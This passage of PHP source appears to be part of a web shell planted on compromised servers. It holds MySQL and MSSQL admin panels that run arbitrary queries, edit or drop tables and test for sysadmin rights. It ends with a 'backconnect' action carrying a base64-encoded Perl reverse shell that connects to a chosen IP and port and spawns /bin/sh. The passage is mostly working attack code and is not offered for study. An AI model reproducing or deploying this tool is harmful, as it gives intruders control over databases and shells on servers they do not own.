		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
		$tabledb = array();
		if ($dbname) {
			p('<p>');
			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
			if ($tablename) {
				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
			}
			p('</p>');
			mysql_select_db($dbname);

			$getnumsql = '';
			$runquery = 0;
			if ($sql_query) {
				$runquery = 1;
			}
			$allowedit = 0;
			if ($tablename && !$sql_query) {
				$sql_query = "SELECT * FROM $tablename";
				$getnumsql = $sql_query;
				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
				$allowedit = 1;
			}
			p('<form action="'.$self.'" method="POST">');
			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
			makehide('tablename', $tablename);
			makehide('action','mysqladmin');
			p($dbform);
			p('</form>');
			if ($tablename || ($runquery && $sql_query)) {
				if ($doing == 'structure') {
					$result = q("SHOW COLUMNS FROM $tablename");
					$rowdb = array();
					while($row = mysql_fetch_array($result)) {
						$rowdb[] = $row;
					}
					p('<table border="0" cellpadding="3" cellspacing="0">');
					p('<tr class="head">');
					p('<td>Field</td>');
					p('<td>Type</td>');
					p('<td>Null</td>');
					p('<td>Key</td>');
					p('<td>Default</td>');
					p('<td>Extra</td>');
					p('</tr>');
					foreach ($rowdb as $row) {
						$thisbg = bg();
						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
						p('<td>'.$row['Field'].'</td>');
						p('<td>'.$row['Type'].'</td>');
						p('<td>'.$row['Null'].'&nbsp;</td>');
						p('<td>'.$row['Key'].'&nbsp;</td>');
						p('<td>'.$row['Default'].'&nbsp;</td>');
						p('<td>'.$row['Extra'].'&nbsp;</td>');
						p('</tr>');
					}
					tbfoot();
				} elseif ($doing == 'insert' || $doing == 'edit') {
					$result = q('SHOW COLUMNS FROM '.$tablename);
					while ($row = mysql_fetch_array($result)) {
						$rowdb[] = $row;
					}
					$rs = array();
					if ($doing == 'insert') {
						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
					} else {
						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
						$where = base64_decode($base64);
						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
						$rs = mysql_fetch_array($result);
					}
					p('<form method="post" action="'.$self.'">');
					p($dbform);
					makehide('action','mysqladmin');
					makehide('tablename',$tablename);
					p('<table border="0" cellpadding="3" cellspacing="0">');
					foreach ($rowdb as $row) {
						if ($rs[$row['Field']]) {
							$value = htmlspecialchars($rs[$row['Field']]);
						} else {
							$value = '';
						}
						$thisbg = bg();
						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
						if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
							p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>');
						} else {							
							p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
						}
					}
					if ($doing == 'insert') {
						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
					} else {
						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
						makehide('base64', $base64);
					}
					p('</table></form>');
				} else {
					$querys = @explode(';',$sql_query);
					foreach($querys as $num=>$query) {
						if ($query) {
							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
							switch(qy($query))
							{
								case 0:
									p('<h2>Error : '.mysql_error().'</h2>');
									break;	
								case 1:
									if (strtolower(substr($query,0,13)) == 'select * from') {
										$allowedit = 1;
									}
									if ($getnumsql) {
										$tatol = mysql_num_rows(q($getnumsql));
										$multipage = multi($tatol, $pagenum, $page, $tablename);
									}
									if (!$tablename) {
										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
										$tablename = $matches[1][0];
									}

									/*********************/
									$getfield = q("SHOW COLUMNS FROM $tablename");
									$rowdb = array();
									$keyfied = ''; //
									while($row = @mysql_fetch_assoc($getfield)) {
										$rowdb[$row['Field']]['Key'] = $row['Key'];
										$rowdb[$row['Field']]['Extra'] = $row['Extra'];
										if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
											$keyfied = $row['Field'];
										}
									}
									/*********************/								
									//
									if (strtolower(substr($query,0,13)) == 'select * from') {
										$query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
									}

									$result = q($query);

									p($multipage);
									p('<table border="0" cellpadding="3" cellspacing="0">');
									p('<tr class="head">');
									if ($allowedit) p('<td>Action</td>');
									$fieldnum = @mysql_num_fields($result);
									for($i=0;$i<$fieldnum;$i++){
										$name = @mysql_field_name($result, $i);
										$type = @mysql_field_type($result, $i);
										$len = @mysql_field_len($result, $i);
										p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
									}
									p('</tr>');
									
									while($mn = @mysql_fetch_assoc($result)){
										$thisbg = bg();
										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
										$where = $tmp = $b1 = '';
										//
										foreach($mn as $key=>$inside){
											if ($inside) {
												//
												if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
													$where = $key."='".addslashes($inside)."'";
													break;
												}
												$where .= $tmp.$key."='".addslashes($inside)."'";
												$tmp = ' AND ';
											}
										}
										//
										foreach($mn as $key=>$inside){
											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
										}
										$where = base64_encode($where);

										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');

										p($b1);
										p('</tr>');
										unset($b1);
									}
									tbfoot();
									p($multipage);
									break;	
								case 2:
									$ar = mysql_affected_rows();
									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
									break;
							}
						}
					}
				}
			} else {
				$query = q("SHOW TABLE STATUS");
				$table_num = $table_rows = $data_size = 0;
				$tabledb = array();
				while($table = mysql_fetch_array($query)) {
					$data_size = $data_size + $table['Data_length'];
					$table_rows = $table_rows + $table['Rows'];
					$table['Data_length'] = sizecount($table['Data_length']);
					$table_num++;
					$tabledb[] = $table;
				}
				$data_size = sizecount($data_size);
				unset($table);
				p('<table border="0" cellpadding="0" cellspacing="0">');
				p('<form action="'.$self.'" method="POST">');
				makehide('action','mysqladmin');
				p($dbform);
				p('<tr class="head">');
				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
				p('<td>Name</td>');
				p('<td>Rows</td>');
				p('<td>Data_length</td>');
				p('<td>Create_time</td>');
				p('<td>Update_time</td>');
				if ($highver) {
					p('<td>Engine</td>');
					p('<td>Collation</td>');
				}
				p('<td>Operate</td>');
				p('</tr>');
				foreach ($tabledb as $key => $table) {
					$thisbg = bg();
					p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
					p('<td>'.$table['Rows'].'</td>');
					p('<td>'.$table['Data_length'].'</td>');
					p('<td>'.$table['Create_time'].'</td>');
					p('<td>'.$table['Update_time'].'</td>');
					if ($highver) {
						p('<td>'.$table['Engine'].'</td>');
						p('<td>'.$table['Collation'].'</td>');
					}
					p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
					p('</tr>');
				}
				p('<tr class='.bg().'>');
				p('<td>&nbsp;</td>');
				p('<td>Total tables: '.$table_num.'</td>');
				p('<td>'.$table_rows.'</td>');
				p('<td>'.$data_size.'</td>');
				p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>');
				p('</tr>');

				p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
				makehide('doing','backupmysql');
				formfoot();
				p("</table>");
				fr($query);
			}
		}
	}
	tbfoot();
	@mysql_close();
}//end mysql


elseif ($action == 'mssqladmin') {
	!$dbhost && $dbhost = 'localhost';
	!$dbuser && $dbuser = 'sa';
	!$dbname && $dbname = 'master';
	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
	if(isset($dbhost)){
		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
	}
	if(isset($dbuser)) {
		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
	}
	if(isset($dbpass)) {
		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
	}
	if(isset($dbname)) {
		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
	}
	if ($insert && $insertsql) {
		$keystr = $valstr = $tmp = '';
		foreach($insertsql as $key => $val) {
			if ($val) {
				$keystr .= $tmp.$key;
				$valstr .= $tmp."'".addslashes($val)."'";
				$tmp = ',';
			}
		}
		if ($keystr && $valstr) {
			msdbconn($dbhost,$dbuser,$dbpass,$dbname);
			m(msq("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : msmsg());
		}
	}
	if ($update && $insertsql && $base64) {
		$valstr = $tmp = '';
		foreach($insertsql as $key => $val) {
			$valstr .= $tmp.$key."='".addslashes($val)."'";
			$tmp = ',';
		}
		if ($valstr) {
			$where = base64_decode($base64);
			msdbconn($dbhost,$dbuser,$dbpass,$dbname);
			m(msq("UPDATE $tablename SET $valstr WHERE $where") ? 'Record updating' : msmsg());
		}
	}
	if ($doing == 'del' && $base64) {
		$where = base64_decode($base64);
		$delete_sql = "DELETE FROM $tablename WHERE $where";
		msdbconn($dbhost,$dbuser,$dbpass,$dbname);
		m(msq("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : msmsg());
	}

	if ($tablename && $doing == 'drop') {
		msdbconn($dbhost,$dbuser,$dbpass,$dbname);
		if (msq("DROP TABLE $tablename")) {
			m('Drop table of success');
			$tablename = '';
		} else {
			m(msmsg());
		}
	}

	formhead(array('title'=>'MSSQL Manager'));
	makehide('action','mssqladmin');
	p('<p>');
	p('DBHost:');
	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
	p('DBUser:');
	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
	p('DBPass:');
	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
	p('</p>');
	formfoot();
?>
<script type="text/javascript">
function editrecord(action, base64, tablename){
	if (action == 'del') {		
		if (!confirm('Is or isn\'t deletion record?')) return;
	}
	$('recordlist').doing.value=action;
	$('recordlist').base64.value=base64;
	$('recordlist').tablename.value=tablename;
	$('recordlist').submit();
}
function moddbname(dbname) {
	if(!dbname) return;
	$('setdbname').dbname.value=dbname;
	$('setdbname').submit();
}
function settable(tablename,doing,page) {
	if(!tablename) return;
	if (doing) {
		$('settable').doing.value=doing;
	}
	if (page) {
		$('settable').page.value=page;
	}
	$('settable').tablename.value=tablename;
	$('settable').submit();
}
function mssqlinfo(dbname) {
	if(!dbname) return;
	$('mssqlinfo').dbname.value=dbname;
	$('mssqlinfo').submit();
}
</script>
<?php
	//
	formhead(array('name'=>'recordlist'));
	makehide('doing');
	makehide('action','mssqladmin');
	makehide('base64');
	makehide('tablename');
	p($dbform);
	formfoot();

	//
	formhead(array('name'=>'mssqlinfo'));
	makehide('action','mssqladmin');
	makehide('doing','mssqlinfo');
	makehide('dbname');
	p($dbform);
	formfoot();

	//
	formhead(array('name'=>'setdbname'));
	makehide('action','mssqladmin');
	p($dbform);
	if (!$dbname) {
		makehide('dbname');
	}
	formfoot();

	//
	formhead(array('name'=>'settable'));
	makehide('action','mssqladmin');
	p($dbform);
	makehide('tablename');
	makehide('page',$page);
	makehide('doing');
	formfoot();

	$cachetables = array();	
	$pagenum = 30;
	$page = intval($page);
	if($page) {
		$start_limit = ($page - 1) * $pagenum;
	} else {
		$start_limit = 0;
		$page = 1;
	}

	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
		!$dbname && $dbname = 'master';
		msdbconn($dbhost, $dbuser, $dbpass, $dbname);
		////////////////////////////////////////////////////////////////
		$query = msq('select @@version');
		$msinfo = mssql_fetch_array($query);
		echo '<p>'.$msinfo[0].'</p>';
		
		$query = msq("SELECT IS_SRVROLEMEMBER('sysadmin')");
		$msinfo = mssql_fetch_array($query);
		$issa = 0;
		if ($msinfo[0]) {
			$issa = 1;
			echo '<h3>Your are sysadmin!</h3>';
		}
		//
		$query = msq("SELECT name FROM master.dbo.sysdatabases WHERE has_dbaccess(name) = 1 ORDER BY name");
		$dbs = array();
		$dbs[] = '-- Select a database --';
		while($db = mssql_fetch_array($query)) {
			$dbs[$db['name']] = $db['name'];
		}
		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
		$tabledb = array();
		if ($dbname) {
			p('<p>');
			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a> [ <a href="javascript:mssqlinfo(\''.$dbname.'\');">information</a> ]');
			if ($tablename) {
				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
			}
			p('</p>');
			if (!@mssql_select_db($dbname)) {
				p('<h2>'.msmsg().'</h2>');
				exit;
			}
			if ($doing == 'mssqlinfo') {
				$result = msq("SELECT t1.owner, t1.crdate, t1.size, t2.DBBupDate, t3.DifBupDate, t4.JournalBupDate FROM (SELECT d.name, suser_sname(d.sid) AS owner, d.crdate, (SELECT STR(SUM(CONVERT(DEC(15), f.size)) * (SELECT v.low FROM master.dbo.spt_values v WHERE v.type = 'E' AND v.number = 1) / 1048576, 10, 2) + 'MB' FROM [$dbname].dbo.sysfiles f) AS size FROM master.dbo.sysdatabases d WHERE d.name = '$dbname') AS t1 LEFT JOIN (SELECT '$dbname' AS name, MAX(backup_finish_date) AS DBBupDate FROM msdb.dbo.backupset WHERE type = 'D' AND database_name = '$dbname') AS t2 ON t1.name = t2.name LEFT JOIN (SELECT '$dbname' AS name, MAX(backup_finish_date) AS DifBupDate FROM msdb.dbo.backupset WHERE type = 'I' AND database_name = '$dbname') AS t3 ON t1.name = t3.name LEFT JOIN (SELECT '$dbname' AS name, MAX(backup_finish_date) AS JournalBupDate FROM msdb.dbo.backupset WHERE type = 'L' AND database_name = '$dbname') AS t4 ON t1.name = t4.name");
				$info = mssql_fetch_assoc($result);

				p('<table border="0" cellpadding="3" cellspacing="0">');
				p('<tr class="head">');
				p('<td colspan="2">'.$dbname.' Information</td>');
				p('</tr>');

				p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
				p('<td>Owner</td><td>'.$info['owner'].'</td>');
				p('</tr>');
				p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
				p('<td>Create date</td><td>'.$info['crdate'].'</td>');
				p('</tr>');
				p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
				p('<td>Size</td><td>'.$info['size'].'</td>');
				p('</tr>');
				p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
				p('<td>Last backup</td><td>'.$info['DBBupDate'].'&nbsp;</td>');
				p('</tr>');
				p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
				p('<td>Last differential backup</td><td>'.$info['DifBupDate'].'&nbsp;</td>');
				p('</tr>');
				p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
				p('<td>Last log backup</td><td>'.$info['JournalBupDate'].'&nbsp;</td>');
				p('</tr>');
				tbfoot();
				p('<br /><br />');
				
				$result = msq("EXEC sp_helpfile");
				$rowdb = array();
				while ($row = mssql_fetch_assoc($result)) {
					$rowdb[] = $row;
				}
				foreach($rowdb as $row){
					p('<table border="0" cellpadding="3" cellspacing="0">');
					p('<tr class="head">');
					p('<td colspan="2">'.$row['name'].'</td>');
					p('</tr>');
					p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
					p('<td>Filename</td><td>'.$row['filename'].'&nbsp;</td>');
					p('</tr>');
					p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
					p('<td>Filegroup</td><td>'.$row['filegroup'].'&nbsp;</td>');
					p('</tr>');
					p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
					p('<td>Size</td><td>'.$row['size'].'&nbsp;</td>');
					p('</tr>');
					p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
					p('<td>Maxsize</td><td>'.$row['maxsize'].'&nbsp;</td>');
					p('</tr>');
					p('<tr class="alt1" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt1\';">');
					p('<td>Growth</td><td>'.$row['growth'].'&nbsp;</td>');
					p('</tr>');
					p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';">');
					p('<td>Usage</td><td>'.$row['usage'].'&nbsp;</td>');
					p('</tr>');
					tbfoot();
					p('<br /><br />');
				}
			} else {
				$getnumsql = '';
				$runquery = 0;
				if ($sql_query) {
					$runquery = 1;
				}
				$allowedit = 0;
				if ($tablename && !$sql_query) {
					$sql_query = "SELECT * FROM $tablename";
					$getnumsql = "SELECT count(*) FROM $tablename";
					$allowedit = 1;
				}

				p('<form action="'.$self.'" method="POST">');
				p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
				makehide('tablename', $tablename);
				makehide('action','mssqladmin');
				p($dbform);
				p('</form>');
				if ($tablename || ($runquery && $sql_query)) {
					if ($doing == 'structure') {
						$result = msq("select b.name,c.name as type,c.xtype,b.length,b.isnullable,b.colstat,case when b.autoval is null then 0 else 1 end,b.colid,a.id,d.text from sysobjects a join syscolumns b on a.id = b.id join systypes c on b.xtype = c.xtype and c.usertype <> 18 left join syscomments d on d.id = b.cdefault where a.id = OBJECT_ID('$tablename') order by b.colid");
						$rowdb = array();
						while($row = mssql_fetch_array($result)) {
							$rowdb[] = $row;
						}
						p('<table border="0" cellpadding="3" cellspacing="0">');
						p('<tr class="head">');
						p('<td>Field</td>');
						p('<td>Type</td>');
						p('<td>Length</td>');
						p('<td>Isnullable</td>');
						p('<td>Key</td>');
						p('<td>Default</td>');
						p('<td>Extra</td>');
						p('</tr>');
						foreach ($rowdb as $row) {
							$thisbg = bg();
							p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
							p('<td>'.$row['name'].'</td>');
							p('<td>'.$row['type'].'['.$row['xtype'].']</td>');
							p('<td>'.$row['length'].'&nbsp;</td>');
							p('<td>'.($row['isnullable'] ? 'Yes' : 'No').'&nbsp;</td>');
							p('<td>'.($row['colstat'] ? 'PRIMARY' : '').'&nbsp;</td>');
							p('<td>'.$row['text'].'&nbsp;</td>');
							p('<td>'.($row['autoval'] ? 'Auto_increment' : '').'&nbsp;</td>');
							p('</tr>');
						}
						tbfoot();
					} elseif ($doing == 'insert' || $doing == 'edit') {					
						$result = msq("select b.name,c.name as type,c.xtype,b.length,b.isnullable,b.colstat,case when b.autoval is null then 0 else 1 end,b.colid,a.id,d.text from sysobjects a join syscolumns b on a.id = b.id join systypes c on b.xtype = c.xtype and c.usertype <> 18 left join syscomments d on d.id = b.cdefault where a.id = OBJECT_ID('$tablename') order by b.colid");
						$rowdb = array();
						while($tb = @mssql_fetch_assoc($result)) {
							$rowdb[$tb['name']] = $tb;
							$rowdb[$tb['name']]['Key'] = $tb['colstat'];
							$rowdb[$tb['name']]['Auto'] = $tb['autoval'];
						}
						$rs = array();
						if ($doing == 'insert') {
							p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
						} else {
							p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
							$where = base64_decode($base64);

							$result = msq("SELECT top 1 * FROM $tablename WHERE $where");
							$rs = mssql_fetch_array($result);
						}
						p('<form method="post" action="'.$self.'">');
						p($dbform);
						makehide('action','mssqladmin');
						makehide('tablename',$tablename);
						p('<table border="0" cellpadding="3" cellspacing="0">');

						foreach ($rowdb as $row) {
							if ($rs[$row['name']]) {
								$value = htmlspecialchars($rs[$row['name']]);
							} else {
								$value = '';
							}
							$thisbg = bg();
							p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
							if ($row['Key'] || $row['Auto']) {
								p('<td><b>'.$row['name'].'</b><br />'.$row['type'].'('.$row['length'].')'.($row['colstat'] ? '<br /><b>PRIMARY</b>' : '').($row['autoval'] ? ' <br /><b>Auto</b>' : '').'</td><td>'.$value.'&nbsp;</td></tr>');
							} else {							
								p('<td><b>'.$row['name'].'</b><br />'.$row['type'].'('.$row['length'].')'.($row['colstat'] ? '<br /><b>PRIMARY</b>' : '').($row['autoval'] ? ' <br /><b>Auto</b>' : '').'</td><td><textarea class="area" name="insertsql['.$row['name'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
							}
						}
						if ($doing == 'insert') {
							p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
						} else {
							p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
							makehide('base64', $base64);
						}
						p('</table></form>');
					} else {
						$querys = @explode(';',$sql_query);
						foreach($querys as $num=>$query) {
							if ($query) {
								p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
								switch(msqy($query))
								{
									case 0:
										p('<h2>Error : '.msmsg().'</h2>');
										break;	
									case 1:
										if (strtolower(substr($query,0,13)) == 'select * from') {
											$allowedit = 1;
										}
										if ($getnumsql) {
											$tatol = mssql_fetch_array(msq("SELECT count(*) FROM $tablename"));
											$tatol = $tatol[0];
											$multipage = multi($tatol, $pagenum, $page, $tablename);
										}
										if (!$tablename) {
											$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
											$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
											preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
											$tablename = $matches[1][0];
										}
										p($multipage);
										p('<table border="0" cellpadding="3" cellspacing="0">');
										p('<tr class="head">');
										if ($allowedit) p('<td>Action</td>');

										$result = msq("select b.name,c.name as type,c.xtype,b.length,b.isnullable,b.colstat,case when b.autoval is null then 0 else 1 end,b.colid,a.id,d.text from sysobjects a join syscolumns b on a.id = b.id join systypes c on b.xtype = c.xtype and c.usertype <> 18 left join syscomments d on d.id = b.cdefault where a.id = OBJECT_ID('$tablename') order by b.colid");
										$rowdb = array();
										$keyfied = ''; //
										while($tb = @mssql_fetch_array($result)) {
											p('<td nowrap>'.$tb['name'].'<br><span>'.$tb['type'].'('.$tb['length'].') '.($tb['colstat'] ? '<b> - PRIMARY</b>' : '').($tb['autoval'] ? '<b> - Auto</b>' : '').'</span></td>');
											$rowdb[$tb['name']]['Key'] = $tb['colstat'];
											$rowdb[$tb['name']]['Auto'] = $tb['autoval'];
											if ($tb['colstat']) {
												$keyfied = $tb['name'];
											}
										}
										p('</tr>');
										
										//
										if (strtolower(substr($query,0,13)) == 'select * from') {
											$query .= " order by $keyfied DESC";
										}

										$result = msq($query);
										$index=0;
										if($pagenum>0) mssql_data_seek($result,$start_limit);
										while($mn = @mssql_fetch_assoc($result)){
											if($index>$pagenum-1) break;

											$thisbg = bg();
											p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
											$where = $tmp = $b1 = '';
											//
											foreach($mn as $key=>$inside){
												if ($inside) {
													//
													if ($rowdb[$key]['Key'] == 1 || $rowdb[$key]['Auto'] == 1) {
														$where = $key."='".addslashes($inside)."'";
														break;
													}
													$where .= $tmp.$key."='".addslashes($inside)."'";
													$tmp = ' AND ';
												}
											}
											//
											foreach($mn as $key=>$inside){
												$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
											}
											$where = base64_encode($where);

											if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');

											p($b1);
											p('</tr>');
											$index++;
											unset($b1);
										}
										tbfoot();
										p($multipage);
										break;	
									case 2:
										$ar = mssql_affected_rows();
										p('<h2>affected rows : <b>'.$ar.'</b></h2>');
										break;
								}
							}
						}
					}
				} else {
					$query = msq("select sysobjects.id,sysobjects.name,sysobjects.category,sysusers.name as owner,sysobjects.crdate from sysobjects join sysusers on sysobjects.uid = sysusers.uid where sysobjects.xtype = 'U' order by sysobjects.name asc");
					$table_num = 0;
					$tabledb = array();
					while($table = mssql_fetch_array($query)) {
						$table_num++;
						$tabledb[] = $table;
					}
					unset($table);

					p('<table border="0" cellpadding="0" cellspacing="0">');
					p('<form action="'.$self.'" method="POST">');
					makehide('action','mssqladmin');
					p($dbform);
					p('<tr class="head">');
					p('<td>Name</td>');
					p('<td>Owner</td>');
					p('<td>Create_time</td>');
					p('<td>Operate</td>');
					p('</tr>');
					foreach ($tabledb as $key => $table) {
						$thisbg = bg();
						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
						p('<td><a href="javascript:settable(\''.$table['owner'].'.'.$table['name'].'\');">'.$table['name'].'</a></td>');
						p('<td>'.$table['owner'].'</td>');
						p('<td>'.$table['crdate'].'</td>');
						p('<td><a href="javascript:settable(\''.$dbname.'.'.$table['name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$dbname.'.'.$table['name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$dbname.'.'.$table['name'].'\', \'drop\');">Drop</a></td>');
						p('</tr>');
					}
					p('<tr class='.bg().'>');
					p('<td>Total tables: '.$table_num.'</td>');
					p('<td colspan="3"></td>');
					p('</tr>');
					p("</table>");
					msfr($query);
				}
			}
		}
	}
	tbfoot();
	@mssql_close();
}//end sql backup


elseif ($action == 'backconnect') {
	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
	!$yourport && $yourport = '12345';
	$usedb = array('perl'=>'perl','c'=>'c');

	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
